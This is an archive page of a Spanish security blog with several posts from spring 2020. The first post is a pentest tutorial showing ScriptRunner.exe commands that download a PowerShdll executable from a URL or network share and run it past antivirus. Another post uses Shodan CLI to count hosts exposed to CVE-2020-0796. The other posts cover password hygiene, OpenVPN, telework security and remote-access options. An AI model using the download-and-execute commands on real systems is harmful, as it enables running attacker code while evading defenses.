3 abr. 2020

Explotando LOLBins en sistemas Windows. Parte 3

Por Juan Antonio Calles el 3 abr. 2020 con 0 comentarios
Buenas a todos, continuando la cadena sobre LOLBins de Windows, hoy quería hablaros de "ScriptRunner.exe", un binario incluído en Windows 10 y en versiones anteriores, que podremos utilizar con la doble funcionalidad de descargar y ejecutar, un potencial ejecutable malicioso.

Este lolbin lo podréis encontrar en el proyecto LOLBAS, sobre el que os hablamos brevemente en anteriores posts de esta cadena:

En el ejemplo que hoy veremos, voy a continuar utilizando las DLLs y EXEs subidas por P3nt4 a su repositorio, al cual podréis acceder desde el siguiente enlace: 

Para descargar el powershell de hoy, utilizaremos "scriptrunner" con el parámetro "appvscript", indicando la URL donde se encuentra el exe:
scriptrunner -appvscript https://github.com/p3nt4/PowerShdll/raw/master/exe/bin/Release/Powershdll.exe



Se descargará el exe como si hubieseis accedido directamente desde el navegador. En mi caso, ha pasado desapercibido para el AV.

Y una vez descargado, podremos ejecutarlo del mismo modo:
scriptrunner -appvscript Powershdll.exe




Si el ejecutable malicioso lo tuviésemos accesible en red, o en un pendrive, podríamos realizarlo con una única instrucción:
scriptrunner -appvscript "\\fluserver\Powershdll.exe"

Como veis, con el mismo resultado:


Así que ya tenéis otro lolbin para añadir a vuestro repositorio de pentest :)

Saludos!
Leer más
      editar

2 abr. 2020

La churrera 2.0 con conchas Shodan y su CLI

Por el 2 abr. 2020 con 0 comentarios
¡Hola a todos!

¿Necesitas consultar un alto volumen de activos en Shodan? ¿Eres un sysadmin de los buenos pero con alergia a Python? Si es así, o si simplemente estás habituado al shell script y quieres conocer una manera simple y non-developer friendly de automatizar consultas a la API de Shodan, te presento Shodan CLI.

Recordando mis viejos tiempos de sysadmin, y el consejo de un antiguo profesor de la carrera ("no reinventes la rueda, busca y si ya está implementado, úsalo"), me dispuse a probar las lindezas que esta solución prometía. Lo cierto es que a los 3 minutos ya estaba volcando los resultados que necesitaba. Si os parece, vamos a dar un breve repaso a cómo configurar la herramienta y algunas pinceladas sobre su uso.


En mi caso, el setup inicial lo realicé en una distro Kali Linux, que por defecto ya cuenta con las librerías oficiales de Shodan para Python (sí, la herramienta está hecha en Python), pero no temáis mis amigos alérgicos, no tendremos que pelearos con Python. Lo que si tenemos que hacer es configurar nuestra API Key de Shodan, tarea tan sencilla como usar el comando init seguido de nuestra key:



Ya tenemos la herramienta lista para jugar con Shodan desde nuestra todopoderosa consola bash. Por cierto, quien no tenga cuenta en Shodan que esté atento a las ofertas, ya que todos los años hay alguna para conseguir cuenta de 100 créditos mensuales por precios que son casi un regalo.

¿Os acordáis de la vulnerabilidad de SMB (CVE-2020-0796) que se conoció por un descuido de Microsoft a primeros de Marzo? Os recomiendo la lectura del post que publicó nuestro compañero @chflorest contándonos entre otras cosas como detectarla en los sistemas de nuestra organización. Volviendo a la herramienta... ¿cuántos Windows con versión de compilación potencialmente vulnerable y SMB publicado nos encontramos en internet?. Shodan CLI nos da la respuesta con el comando count:



Nada menos que más de 38000 resultados únicos. Ésta búsqueda la podéis adaptar perfectamente limitando el resultado a vuestra organización, o lanzándola contra el direccionamiento de vuestra empresa. Pero la herramienta da mucho más de sí y nos permite descargar los resultados a un cómodo JSON comprimido con el comando download:



Los comandos search y download consumen créditos de vuestra cuenta, por lo que debéis de tener cuidado y afinar la búsqueda si no queréis quedaros sin balas en la recámara. Si no se especifica otro límite, por defecto descarga 1000 resultados.

Pero ésto no es todo, Shodan CLI también nos proporciona una funcionalidad para poder tratar el JSON de manera simple sin necesidad de usar otros desarrollos para ello (véase jq). Lo primero es conocer los identificadores de los campos que queremos mostrar, así que podemos usar jq para navegar por el JSON en busca de los identificadores que nos interesan:



Una vez escogidos los identificadores, podemos usar el comando parse para recorrer el JSON y mostrar los que nos interesen. Aquí os dejo un ejemplo del comando parse, en el que mostramos varios campos (ip,ptotocolo de transporte, puerto, organización, país, so) separados por el caracter ‘|’.



Shodan también guarda registro de sus escaneos de vulnerabilidades conocidas, por lo que podemos consultar cuantos de los resultados que hemos guardado todavía siguen siendo vulnerables. Para ello parseamos el JSON mostrando el campo vulns.CVE-2020-0796.verified, que nos indicará si shodan ha detectado el sistema como vulnerable.



De las 1500 entradas en nuestro JSON, 1423 son sistemas todavía vulnerables y sólo 77 son sistemas ya parcheados. ¿Dónde quedaron las políticas de parcheo?

No hemos cubierto todas las funcionalidades de la herramienta, pero creo que hemos visto lo suficiente como para confirmar que cumple con lo que prometía: simple, fácil de usar y efectiva. Si queréis investigar más, os recuerdo que invocando cualquier comando con el argumento -h obtendréis una escueta pero más que suficiente ayuda. Si queréis que ampliemos detalles sobre alguna otra funcionalidad, comentadlo y os contamos entre otras cosas un truquito para gastar menos créditos ;-)

Cuidaos, y recordad: #StayHomeAndHack

Good Hunt!!
Leer más
      editar

1 abr. 2020

Veo veo... ¿Qué leaks? (Parte II)

Por el 1 abr. 2020 con 0 comentarios
Good meowrning! En este post vamos a continuar hablando de contraseñas, teniendo como punto de partida el post anterior, en el que explicamos cómo crear y mantener contraseñas robustas. En este post, vamos a tratar por qué es importante tenerlas.

Para conocer el riesgo que supone desatender las contraseñas que usamos, debemos conocer dos conceptos fundamentales, como son los data leaks y los data breaches. Los leaks (como su traducción en inglés indica) son fugas de información que se producen en un sistema, como consecuencia principalmente de los data breach, que es otro tipo de problema en el que datos sensibles de una compañía son obtenidos debido al acceso no autorizado de una o varias personas. Es decir, al darse un data breach en una compañía y publicarse información sensible, el conjunto de datos que se ha publicado en esa rotura de seguridad es el data leak.

Los data leak se han incrementado en los últimos años como uno de los principales problemas en la confidencialidad de la información de las empresas, siendo los mayores hasta el momento:

EmpresaCuentas (en millones)Año
Yahoo3.0002013
Aadhaar1.1002018
Verifications.io7632019
Yahoo5002014
Marriott/Starwood5002018
Adult Friend Finder412.22016
MySpace3602013
Exactis3402018
Twitter3302018
NetEase2342015
LinkedIn1652012

Para conocer en mayor detalle las fugas que se han producido hasta el momento, la aplicación informationisbeautiful.net realiza un seguimiento y actualización de las mismas, mostrando artículos en los que se especifica la información del ataque correspondiente.

La siguiente imagen es un ejemplo de los data breaches producidos desde el año 2016, junto con la cantidad de credenciales filtradas en los mismos:



Debido al crecimiento de este tipo de ataques, han ido apareciendo herramientas para poder comprobar si una cuenta de email se encuentra en alguna de las fugas producidas hasta el momento, como son:
Hay otras herramientas que muestran aquellas empresas que han sufrido data breaches, con la información correspondiente del mismo:
Y paralelamente a las anteriores, tenemos entre las siguientes webs muchas posibilidades de encontrar leaks (sobre todo si son recientes):

Pero es que además, no podemos olvidar que tenemos a nuestros amigos y vecinos Google Hacking y las contraseñas por defecto.

Ahora, ¿por qué son tan relevantes estos problemas? Porque (como ya vimos en la primera parte de estos posts) el uso de contraseñas únicas es un punto clave a la hora de mantener nuestras credenciales a salvo de estos ataques, pero a pesar de ello, la reutilización de contraseñas es un hecho más común de lo que podemos pensar, ya que en 2019 las contraseñas más usadas han sido (según el fabricante ESET):
  1. 12345
  2. 123456
  3. 123456789
  4. test1
  5. Password
  6. 12345678
  7. Zinch
  8. g_czechout
  9. asdf
  10. qwerty
En el siguiente post comentaremos cómo sacan los delincuentes partido a esta información filtrada.

Muchos maullidos! :)
M
Leer más
      editar

31 mar. 2020

OpenVPN: Accediendo a tu empresa desde el sofá de forma segura

Por el 31 mar. 2020 con 0 comentarios
¡Muy buenas!

Como habréis podido comprobar, últimamente estamos hablando mucho de VPNs en Flu, y es que las condiciones nos fuerzan a ello. Aún hay ahí fuera muchas empresas de diverso tamaño que no han establecido el teletrabajo por diferentes razones; algunas de ellas, entendemos, que por el desconocimiento de cómo implementarlo. Este problema afecta, sobre todo, a pequeñas empresas que no tienen un equipo de IT. Hablamos de PYMES que bastante tienen ya con sobrevivir en el mundo en el que vivimos, y no han tenido tiempo o necesidad de adaptar sus redes al trabajo remoto. Es sobre todo por ellas por las que estamos publicando estos posts últimamente.

En el último post sobre VPNs, nuestro compañero Nico nos habló de tres conceptos imprescindibles para implementar el trabajo remoto en una organización: VDI, VPN y RDP. En el post de hoy, os hablaremos sobre una solución abierta para poder montar una VPN dentro de vuestra organización: OpenVPN.


OpenVPN es un protocolo open source que está entre nosotros desde el año 2001. Conceptualmente, su funcionamiento es muy sencillo: los equipos remotos (clientes OpenVPN) se conectarán a un equipo dentro de la red de la organización (servidor OpenVPN), establecerán un túnel cifrado seguro y redirigirán todo el tráfico que generen a través de él. De esta forma, el servidor OpenVPN introducirá a los equipos clientes dentro de la red de la organización, por lo que a efectos prácticos serán un equipo interno más, accediendo a los mismos recursos y saliendo a Internet por el mismo punto de acceso que si estuvieran conectados desde dentro de la empresa.

Debe diferenciarse OpenVPN de los servicios VPN que vemos en Internet (como NordVPN, ExpressVPN, ProtonVPN o HideMyAss). Con estos servicios VPN (incluso aunque usen el protocolo OpenVPN por detrás) lo único que se consigue es salir a Internet a través de un equipo de estas empresas (sin que se pueda saber el origen real de la conexión), sin tener visibilidad de otros equipos o recursos.

Existen múltiples alternativas para configurar un servidor OpenVPN dentro de la organización. A continuación, os presentamos algunas alternativas:
  • Configurar un servidor para que levante un servicio OpenVPN. Esta es la opción que os recomendamos, aunque también es la más compleja de realizar. Requiere seguir un procedimiento de forma rigurosa para configurar de forma segura el servicio. Os recomendamos este tutorial de DigitalOcean.
  • Si vuestra empresa cuenta con un firewall pfSense, en este enlace tenéis un tutorial con el que configurar el firewall para dar servicio OpenVPN. Además, podréis generar certificados de acceso para los clientes de forma sencilla siguiendo este tutorial.
  • Si os gusta trastear y tenéis un modelo compatible, podréis modificar el firmware de vuestro router para que use el sistema OpenWRT en lugar del proporcionado. Entre otras funcionalidades, OpenWRT permite establecer un servidor OpenVPN, siguiendo este tutorial. No obstante, no os garantizamos que el rendimiento del router sea el mismo que con el firmware oficial (¡jugáis bajo vuestra propia responsabilidad!).
  • Si sois una empresa pequeña, podríais usar una Raspberry Pi para levantar el servicio OpenVPN, teniendo en cuenta que el rendimiento de estos equipos es limitado. En este caso nos encontramos ante un procedimiento sencillo, pero la seguridad del mismo no está del todo garantizada (no siempre es recomendable confiar en cosas que nos vienen dadas). Como podéis ver en https://www.pivpn.io/, es tan facil como lanzar un comando y seguir el proceso de instalación.
  • Existe otra opción que simplifica el proceso de configuración, que es utilizar contenedores Docker siguiendo este tutorial. No obstante, y al igual que en el caso anterior, no os recomendamos dejar la seguridad de vuestra empresa en manos de una solución que ha implementado otra persona.
Esperamos que estos enlaces os sean de interés :)

¡Salud y ánimo!
Leer más
      editar

30 mar. 2020

Veo veo... ¿Qué leaks? (Parte I)

Por el 30 mar. 2020 con 0 comentarios
Good meowrning! Dadas las circunstancias especiales que estamos viviendo debido al COVID-19, para pasar el tiempo de una forma u otra, estamos haciendo más uso del normal de nuestros dispositivos, ya sea con el pc, tablet, smartphone, smartTV, o incluso con videoconsolas. Por ello, debido al aumento de esta actividad en internet con las aplicaciones que utilizamos habitualmente (Netflix, WhatsApp, Instagram...), junto con aquellos servicios en los que nos damos de alta porque nos ofrecen otro tipo de entretenimiento, en esta serie de posts vamos a hablar de la importancia que tiene establecer diferentes contraseñas para cada cuenta, además de otras características como su robustez, periodicidad, y las consecuencias que puede tener de cara a un robo de nuestras cuentas.

En las charlas y cursos de concienciación se suele hacer especial mención a las 4 requisitos que deben tener las contraseñas que usamos:
  • Minúsculas
  • Mayúsculas
  • Números
  • Caracteres especiales. 
De forma adicional a ellas, hay un factor que es fundamental para diferenciar el nivel de robustez de las contraseñas, su longitud. Hasta ahora, se nos ha dicho que las contraseñas debían tener un mínimo de 8 caracteres para que fueran consideradas como robustas, pero hace poco más de un año @TinkerSec publicaba en este tweet cómo, haciendo uso de hashcat y 8 tarjetas gráficas NVIDIA GTX 2080Ti, era capaz de descifrar las contraseñas en cuestión de 2.5 horas. Por ello la longitud mínima que debe tener nuestra contraseña para ser considerada segura se ha visto aumentada a un mínimo de 15 caracteres.

Adicionalmente a los puntos anteriores, también es fundamental tener en cuenta 2 factores:
  • Cambiar periódicamente las contraseñas (y que esa periodicidad no sea cada 3 años).
  • No reutilizar contraseñas en los diferentes servicios en los que estemos registrad@s.



Pero ahora nos surge una duda, ¿como creo una contraseña con todas estas características y a la vez ser capaz de acordarme de ella luego? Tenemos varias posibilidades:
  • Reglas mnemotécnicas. Este tipo de técnica nos permite que, a partir de a partir de una idea inicial, poder crear una asociación mental de la información que queremos memorizar (y posteriormente recordar).
  • Generadores de contraseñas. Son herramientas muy útiles cuando queremos obtener contraseñas con unas características específicas y aleatorias (que a la vez son más difíciles de recordar). Un ejemplo de ellos es passwordsgenerator.net

De la mano de los generadores de contraseñas, tenemos una opción muy viable para mantener todas nuestras credenciales actualizadas. Se trata del uso de gestores (o administradores) de contraseñas, los cuales nos permiten centralizar y gestionar la información con la que nos identificamos en distintas aplicaciones. De la misma forma, a la hora de crear una nueva contraseña para que sea asociada a una aplicación, muchos de los gestores de contraseñas poseen generadores de passwords con los requisitos que se deseen. Algunos de los gestores más conocidos son KeePass, LastPass o 1password.


Para complementar a estas contraseñas robustas, y añadir una capa más de seguridad a la hora de iniciar sesión en una aplicación, nos encontramos con la autenticación multifactor (MFA), que se trata de un sistema de seguridad que requiere de más de una autenticación para verificar nuestra identidad. Este tipo de autenticación adicional puede tratarse del uso de un pin, un token de un solo uso (OTP), identificación a través de la huella dactilar o del reconocimiento facial, el uso de un token hardware... De forma que, según la aplicación a la que intentes acceder, tendrá implementado un sistema u otro.

A modo de recomendación, es conveniente saber que el NIST provee de una guía de contraseñas en la que algunos puntos quizás os suenan :)

Como conclusión a esta primera parte, me gustaría destacar que, a pesar de estas buenas prácticas que hemos comentado y que tanto se nos repiten, a día de hoy, un gran número de entidades bancarias siguen haciendo uso de claves de acceso a sus áreas de cliente solicitando una clave numérica entre 6-8 dígitos, el pin de la tarjeta, o claves numéricas con 4 dígitos + DNI (y que además la mayoría coinciden en el uso de otra clave adicional + OTP vía SMS para la realización de las transacciones, o simplemente el OTP vía SMS), tomando este tipo de medidas en muchos casos por compatibilidad con sistemas legacy que poseen en sus infraestructuras.

En los próximos posts de esta cadena veremos las consecuencias de desatender nuestras credenciales :).

Muchos maullidos!
M
Leer más
      editar

27 mar. 2020

Sigue en directo #FluCON desde aquí

Por Juan Antonio Calles el 27 mar. 2020 con 0 comentarios
Leer más
      editar

26 mar. 2020

Teletrabajo: #QuédateEnCasa pero seguro

Por el 26 mar. 2020 con 0 comentarios
Intentando sacar algo positivo de esta situación que estamos viviendo actualmente en España, y en otros países de todo el mundo, seguimos con consejos sobre teletrabajo. Sabiendo que muchas empresas se han visto forzadas a desplegar rápidamente todo tipo de soluciones y medios (cada uno el que buenamente ha podido), queremos aportar nuestro granito de arena haciendo un resumen de recomendaciones de seguridad genéricas. 

Tal y como comentó nuestro compañero Luis en este artículo, el CCN-CERT publicó un informe bastante extenso y completo sobre indicaciones de seguridad para montar una infraestructura de teletrabajo segura. Sin embargo, no se habla mucho del problema de proporcionar seguridad en los equipos que usa la gente en sus casas. De forma inevitable, los dispositivos se usarán tanto para actividades laborales, como de ocio o para necesidades personales (¿desde dónde hacemos nuestras compras online?), incrementando el nivel de exposición a amenazas, además de que ya no disponemos de las protecciones que nos ofrece nuestra red interna empresarial. En la medida de lo posible, nos corresponde a nosotros mismos hacer un buen uso de los recursos, pero no hay que olvidar que muchas personas no tienen más remedio que usar su propio equipo personal para teletrabajar.

Pensando sobre todo en este último caso, vamos a hacer una recopilación de consejos básicos, pero fundamentales para garantizar la seguridad de nuestros dispositivos.


Actualiza


Este es el típico consejo que siempre se dice pero nunca se sigue de verdad. Sin embargo, es muy importante para mantener nuestros sistemas seguros, y es por eso que los de seguridad somos tan pesados con este tema. Constantemente aparecen nuevas vulnerabilidades que pueden comprometer gravemente nuestro equipo. Un ejemplo de ello es la reciente vulnerabilidad crítica de Windows que nuestro compañero Christian comentó en este otro artículo.

Si no se fuerza a nivel empresarial (a través de directivas de grupo, por ejemplo), o si utilizamos nuestro propio equipo personal para teletrabajo, es necesario comprobar nosotros mismos que tenemos todo actualizado y parcheado: sistema operativo, aplicaciones (incluidos los clientes de vpn y conexión remota) y navegadores. Existen herramientas de diagnóstico que nos facilitan la detección de software obsoleto y actualizaciones pendientes, y sistemas de alertas para recibir notificaciones sobre vulnerabilidades y actualizaciones de seguridad recientes.

Usa un buen antivirus


Aunque Windows Defender nos ha ido demostrando estos últimos tiempos que puede ser una buena opción gratuita, quizás es el momento de pensar en comprar una licencia de antivirus. No es el objetivo de este artículo hacer una tabla comparativa de todas las opciones que existen en el mercado, ya que son muchas y dependerá de las necesidades particulares de cada uno. Lo más importante es que la mayoría de ellos ofrecen una navegación segura, detectando y bloqueando URLs y descargas maliciosas, e incluyen mecanismos de protección contra malware.

Bloquea tráfico innecesario


Es importantísimo configurar correctamente el firewall del sistema, y sin embargo suele ser un gran olvidado. Si nuestra empresa no dispone de políticas específicas, o si utilizamos nuestro equipo personal, es una buena práctica de seguridad crear reglas para permitir únicamente el tráfico que sea estrictamente necesario y denegar el resto, o al menos bloquear el tráfico en aquellos puertos que usan servicios conocidos vulnerables para reducir los potenciales vectores de ataque. No está de más asegurarnos de que se almacenan correctamente los logs del firewall.

Desconfía


Quizás este sea uno de los mejores consejos a día de hoy. Aprovechándose de esta situación excepcional, se han visto incrementados considerablemente los intentos de fraude y phishing estos días. Es una ocasión perfecta, ya que aprovechan que estamos “aislados” de nuestro entorno laboral para engañarnos más fácilmente, suplantando la identidad de algún compañero o utilizando la típica estafa del CEO. En estos casos siempre es aconsejable desconfiar, y contactar directamente con la persona involucrada (a ser posible a través de otro medio) o un tercero de confianza que nos pueda confirmar o desmentir. También aprovechan que estos días estamos muy pendientes de las noticias para usar tristemente el asunto del coronavirus como cebo. El CCN-CERT lanzó hace unos días una alerta por el repunte de campañas de phishing por COVID-19.

Por último, me gustaría hacer una reflexión. Estamos físicamente aislados, pero gracias a la tecnología, seguimos muy conectados, con las ventajas y desventajas que ello conlleva. 

¡Saludos y ánimo!
Leer más
      editar

25 mar. 2020

Hoy Platón no sería filósofo, sería Hacker.

Por Mr.Freeman el 25 mar. 2020 con 0 comentarios
¿Alguna vez os habéis planteado que el ámbito de la ciberseguridad se asemeja muchísimo al mito de la caverna de Platón?

En esta alegoría, Sócrates pide a Glaucón (hermano de Platón) que se imagine la siguiente situación: un muro dentro de una caverna. A un lado, prisioneros encadenados; al otro lado, un fuego resplandeciente; y encima del muro, una serie de figuras movidas por personas del mundo exterior. Los prisioneros, quienes en su vida no han visto más que el interior de dicha cueva, viven pensando que las luces y sombras que ven reflejadas en la pared de la misma componen su realidad.
Este no es Platón pero, ¿A que queda bien?

En cierto momento, uno de los prisioneros se libera de sus cadenas y decide escalar la pared. a duras penas lo consigue y, al asomarse, casi queda ciego y cae de nuevo en las tinieblas. Sin embargo, resistió y se dio cuenta que no fue la intensidad de la luz lo que le cegó sino la falta de costumbre a esta por lo que, una vez recuperada la vista, decide avanzar. Más allá de la cueva, descubre que no solo existen luces y sombras sino que estas, a su vez, definen nuevas formas, objetos y personas. Descubre  lo que podría denominarse como: el mundo real. 

Asimilada esta nueva idea, decide volver a la caverna para compartir la experiencia con sus compañeros de encierro e invitarles a conocer la verdadera realidad. Sin embargo, convencerles fue imposible. ¿Por qué? Sus ojos se acostumbraron a la luz y, por tanto, ya no era tan hábil en la oscuridad. El resto de prisioneros, al ver esto, se aferraron a la idea de que le mundo exterior no solo no le había beneficiado sino que, además, le había dañado la vista. Esto no solo provocó que se negaran a acompañarle sino que, ante las insinuaciones de su antiguo compañero, algunos reaccionaron de manera tan agresiva que llegaron a plantearse acabar con la vida de este. Todo ello con tal de seguir viviendo en, lo que para ellos era, su verdadera realidad. 

Vale y... ¿Qué tiene que ver esto con la ciberseguridad?

Pues veréis. Llevamos décadas inmersos en un desarrollo tecnológico que no hace más que crecer. Todas estas nuevas tecnologías han pasado a formar parte de, prácticamente, todos los aspectos de nuestra vida. Está presente en nuestros teléfonos, coches e incluso, en nuestros electrodomésticos. Es por ello que no sería una locura afirmar que todo este ecosistema digital se ha convertido en nuestra cueva. 

Hemos pasado de llevar un ordenador en el bolsillo a confiarle nuestra vida sin reparar apenas, en la información que almacena sobre todos nosotros: quiénes somos, qué o quién nos gusta, cuánto dinero tenemos, en qué lo gastamos, en qué banco lo guardamos y un sinfín de etcéteras.. Sin embargo, gran parte de la sociedad, o no lo ve, o no lo quiere ver. Y la pregunta es ¿por qué? Simple. Porque hemos dejado que nos cieguen. La tecnología se ha desarrollado al mismo tiempo que ha crecido nuestra demanda insaciable. Queremos el mejor teléfono al menor coste posible, las aplicaciones más estéticas y funcionales, el Internet más rápido... lo queremos todo, y lo queremos ya. Mientras tanto, hay una pregunta que, aunque cada vez más, pocos nos hacemos ¿Es que todo esto del avance tecnológico es tan bueno, bonito y barato, aunque no siempre, como lo pintan?

 Como diría Platón: ¿Es esto la pared de la cueva o el mundo exterior? 

Este tampoco es Platón, pero es un plato muy grande

Llevo haciéndome esa misma pregunta seis meses, justo el el tiempo en el que llevo formando parte del que es, en mi opinión, el mejor equipo de hackers que conozco. Cada uno de sus miembros, me recuerda al prisionero que, una vez libre de cadenas, decidió replantearse qué es lo que hay más allá del muro, dando el primer paso hacia el verdadero conocimiento del mundo digital tal y como lo conocemos, con sus luces pero, sobre todo, con sus sombras. No hay día que no me sorprenda su capacidad de analizar si toda novedad es tan cierta y/o segura como nos la venden. No contentos con ello, a menudo por iniciativa propia, deciden asegurarse que efectivamente esto es así, aunque por el camino sea necesario romper alguna cosa que otra.

Por último, no menos importante e igual de relacionado con nuestro mito, el conocimiento, como dirían mis compañeros, es Open Source. Para los noobs como yo, esto significa, por así decirlo que todo el mundo pueden acceder a él y distribuirlo de la forma que consideren conveniente.

Todo ello con un objetivo dual: por un lado insta a los creadores a reparar sus errores que, si no son solventados, pueden causar daño a sus usuarios; y, por otro lado, alertar a la sociedad de cuáles son las consecuencias a las que se expone en caso de seguir confiando en ellos, a ciegas.

El problema, y con esto ya termino, es que al igual que le pasó al iluminado prisionero, el conocimiento, aunque a veces cierto, no siempre desea ser recibido y, por tanto, será negado por muchos y atacado por otros tantos. Esto, amigos míos, se debe a que es más sencillo acomodarse en la ignorancia que aguantar el dolor de reconocer que, el primer paso para abrir la mente al conocimiento, es aceptar nuestra propia ignorancia.

Ahora la pregunta es: ¿Te atreves a ver lo que hay más allá del muro?

Leer más
      editar

24 mar. 2020

Derrotando al COVID19: El "Manage" à trois del teletrabajo (Escritorio remoto vs VPN vs VDI)

Por el 24 mar. 2020 con 0 comentarios
No todas las empresas que tienen necesidad de teletrabajo durante esta crisis, están relacionadas con el mundo IT. Tampoco todas cuentan con presupuestos gigantescos para disponer de un equipo que les gestione la infraestructura en este tipo de situaciones.

Por ello, en Flu queremos dar a conocer, desde una perspectiva para nuestros lectores "no tan técnicos", qué opciones existen y en la medida de lo posible facilitar información para su instalación y despliegue, ayudándoos a reducir el impacto del virus en vuestros negocios. Incluso puede que ya estéis utilizando algunos de estos servicios o protocolos en vuestro trabajo actual, así que es bueno que conozcamos las diferencias entre ellos.

Escritorio Remoto:

Podemos decir que existen dos protocolos principales para la conexión con un escritorio remoto. El primero, RDP (Remote Desktop Protocol), fue originalmente desarrollado por Microsoft. Aunque a día de hoy hay disponibles clientes para todas las plataformas. El servidor es inherente a Windows, ya que el inicio de sesión se hace mediante el core de este. El segundo es VNC (Virtual Network Computing), es multiplataforma, tanto en cliente como en servidor, utilizando protocolo libre, que implementa la funcionalidad de escritorio remoto sin restricciones en el sistema operativo.


El propósito de ambos protocolos es facilitar a una persona conectarse a un ordenador en una red remota y utilizar su interfaz gráfica. Permite compartir el ratón, el teclado e incluso el portapapeles.

Aunque sea la primera opción mencionada, utilizar un escritorio remoto es también la menos segura, y no se aconseja su uso. Funciona, y es muy sencillo de configurar, pero a nivel de seguridad, tanto RDP como VNC, son bastante más vulnerables que los métodos que explicamos a continuación.

VPN (Virtual Private Network):


Tal como su nombre indica, es una red privada virtual. Muchos ya habréis utilizado alguna para cambiar virtualmente vuestra ubicación, ya sea por razones más o menos éticas. Existen diferentes protocolos que permiten establecer una conexión de este tipo, y permiten crear un túnel de conexión cifrado entre dos redes.
Imagen de INCIBE
Es mucho más versátil que el escritorio remoto, aunque también algo más complejo de configurar y mantener. Permitirá el acceso externo de forma segura, con posibilidad de segregación de usuarios, a servicios disponibles solo de forma interna a la empresa. Además, estaremos adheridos de forma intrínseca a los sistemas de seguridad que haya implementados en la red de destino.

Hay que tener en cuenta, que cuando estamos conectados a una VPN, el ancho de banda de nuestra conexión pasará a ser equivalente al ancho de banda que tengamos en la red de destino. Por tanto, es importante dimensionar bien este tipo de conexión para tener siempre un buen funcionamiento de la red.

VDI (Virtualización de sistemas o aplicaciones):

Con un sistema VDI, es posible tener acceso al mismo escritorio virtual todo el tiempo. Es parecido a un escritorio remoto, pero en este caso, no accedemos a una máquina real, sino a una virtualizada en un servidor central. Por ejemplo, puede haber varias imágenes dependiendo del tipo de usuario que accede, cada una de ellas con aplicaciones distintas.



Facilita bastante el mantenimiento, ya que cambiando la imagen, los cambios se aplican de forma instantánea a todos los usuarios que la utilicen. Muchos usuarios conocen este servicio por el nombre comercial de uno de los proveedores más famosos, Citrix.


RDP
VPN
VDI
¿Cómo funciona?
Es literalmente una conexión remota con un PC que se encuentre dentro de la red empresarial
Un equipo establece un túnel seguro de conexión hacia la organización, desde ese momento el equipo formará parte de la red interna.
Permite disponer de equipos y aplicaciones mediante una imagen preconfigurada que se guarda en un servidor interno
¿A qué podemos acceder?
Accedemos directamente al control de un equipo interno de la empresa, y por tanto a todo lo que este equipo tenga accesible.
A cualquier recurso corporativo que esté configurado en la política de acceso de VPN. Generalmente varía dependiendo del perfil que accede. Es altamente configurable.
Tendremos acceso a los recursos que se hayan preestablecido previamente en la imagen que existe en el servidor de virtualización.
Acceso local a los datos
En principio están aislados en el equipo que se encuentra en la red interna.
Permite que los datos sean salvados en el cliente externo, ya que formamos parte de la red con la máquina desde la que accedemos.
Proporciona un equipo seguro desde la nube empresarial que mantiene los datos aislados de la red externa.
Posibilidad de trabajar offline
Es necesaria la conexión permanente hacia el escritorio remoto.
Puede trabajarse online si descargamos los datos necesarios para ello a la red externa.
Es necesaria la conexión permanente hacia el equipo remoto virtualizado.
Seguridad final de los datos
En principio, los datos no pueden ser salvados hacia el exterior, pero por lo general los protocolos de escritorio remoto no tienen opciones de seguridad avanzadas.
Una vez que los datos están en el dispositivo externo, la organización pierde la visibilidad de los mismos, lo que puede resultar en perdidas y robos de datos si no está bien gestionado.
Los datos no pueden ser salvados hacia el exterior, protegiendo el sistema de la posible pérdida de un dispositivo externo. El sistema virtualizado permanece tras todos los controles de seguridad internos de la empresa.
Seguridad del dispositivo final
Los parches y las actualizaciones dependen de la gestión interna de los equipos de la empresa ya sea manualmente o mediante un SCCM. Independientes del dispositivo externo.
Los parches y actualizaciones deben gestionarse por separado en cada dispositivo que se conectará a la VPN.
Los parches y las actualizaciones se hacen de manera centralizada, directamente en las imágenes de virtualización. Son independientes del dispositivo externo.

El uso de estos métodos de conexión no está supeditado a usar únicamente uno de ellos. En muchas empresas se implementan varios dependiendo de las necesidades del servicio. Eso sí, es muy importante mantener bien configurados y actualizados los sistemas de acceso externo a la empresa, pues son uno de los primeros objetivos que pueden intentar explotarse en posibles ataques.

¡Saludos!
Leer más
      editar

23 mar. 2020

¡Publicada la agenda para #FluCON Online Edition!

Por Juan Antonio Calles el 23 mar. 2020 con 0 comentarios
Buenas a todos, acabamos de publicar la agenda final de la FluCON Online Edition, que tendrá lugar el próximo viernes 27 de marzo de 2020, a las 16:30 horas de España peninsular (UTC+1).




El congreso podréis seguirlo en directo por YouTube desde AQUÍ:



¡No faltéis! 

Pablo y Juanan

Leer más
      editar
>